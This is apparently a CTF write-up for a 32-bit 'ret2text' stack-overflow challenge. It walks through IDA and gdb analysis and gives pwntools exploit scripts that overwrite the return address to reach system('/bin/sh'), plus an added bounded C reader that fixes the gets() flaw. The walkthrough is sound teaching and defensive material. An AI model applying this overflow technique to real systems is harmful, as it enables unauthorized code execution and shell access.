1. Check the protection mechanisms
(1) NX (non-executable stack) is enabled
(2) The file is a 32-bit binary
2. Open the file in 32-bit IDA
(1) Run it first to see what it does
(2) Press Shift+F12 to list the strings
We see the key string system("/bin/sh")
(3) Go into the main function
As soon as we see gets() we have found the overflow point. IDA lists the buffer s as 0x64
We construct the payload
```python
# encoding = utf-8
from pwn import *

context(os='linux', arch='i386', log_level='debug')
content = 1  # 1 = run the local binary

def main():
    if content == 1:
        p = process('./ret2text')
        binsh_addr = 0x0804863A  # address of the system("/bin/sh") call found in IDA
        # first attempt: IDA's 0x64 for s plus 4 bytes of saved ebp, then the return address
        payload = b'a' * (0x64 + 0x4) + p32(binsh_addr)
        p.recvuntil(b"There is something amazing here, do you know anything?\n")
        p.sendline(payload)
        p.interactive()

main()
```
We find that we did not get a shell
(4) Debug with gdb to find the location of s and compute the offset
Find the call that takes s as its argument, at 0x080486AE
Set a breakpoint on that call in gdb
Then run
s is located at 0xffffd0ec
Offset of s relative to ebp: ebp - s = 0xffffd158 - 0xffffd0ec = 0x6c, so IDA's 0x64 was not the real distance to the saved ebp
Offset of s relative to the return address: 0x6c + 0x4
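As an added example (not part of the original writeup), the bounded line reader below is the fix for the gets() call found in main: with the same 0x64-byte buffer, a line of 0x6c + 0x4 bytes, which would reach the return address, is refused and drained instead of overwriting the stack. The buffer size and padding lengths are taken from the writeup above; fmemopen is only used to feed a constructed input line, and the function names are mine.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Same buffer size IDA listed for s in the challenge's main(). */
#define BUF_LEN 0x64

/* Bounded replacement for gets(): read one line from `in` into dst (cap bytes).
 * Returns the line length on success, or -1 if the line did not fit, in which
 * case the rest of the line is drained so the caller can safely re-prompt. */
int read_line(FILE *in, char *dst, size_t cap) {
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return (int)(n - 1);
    }
    /* No newline in dst: the line ended at EOF, fit exactly, or was too long. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return (int)n;
    while (c != '\n' && c != EOF)   /* drain the overflowing remainder */
        c = fgetc(in);
    return -1;
}

/* Feed a constructed input line through read_line with the challenge's
 * buffer size; returns the accepted length or -1 when it was refused. */
int check_input(const char *line) {
    char s[BUF_LEN];
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return -2;
    int r = read_line(in, s, sizeof s);
    fclose(in);
    return r;
}

/* Build a line of pad_len 'a' bytes plus newline, like the exploit padding,
 * and check whether the bounded reader accepts it. */
int check_padding(size_t pad_len) {
    char line[512];
    if (pad_len > sizeof line - 2)
        return -2;
    memset(line, 'a', pad_len);
    line[pad_len] = '\n';
    line[pad_len + 1] = '\0';
    return check_input(line);
}
```

Both paddings tried in the writeup, 0x64 + 0x4 and 0x6c + 0x4, are refused because they exceed the 99 bytes the buffer can hold.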
3. EXP
```python
# encoding = utf-8
from pwn import *

context(os='linux', arch='i386', log_level='debug')
content = 1  # 1 = run the local binary

def main():
    if content == 1:
        p = process('./ret2text')
        binsh_addr = 0x0804863A  # address of the system("/bin/sh") call found in IDA
        # offset measured in gdb: 0x6c from s to the saved ebp, plus 4 bytes of saved ebp
        payload = b'a' * (0x6c + 0x4) + p32(binsh_addr)
        p.recvuntil(b"There is something amazing here, do you know anything?\n")
        p.sendline(payload)
        p.interactive()

main()
```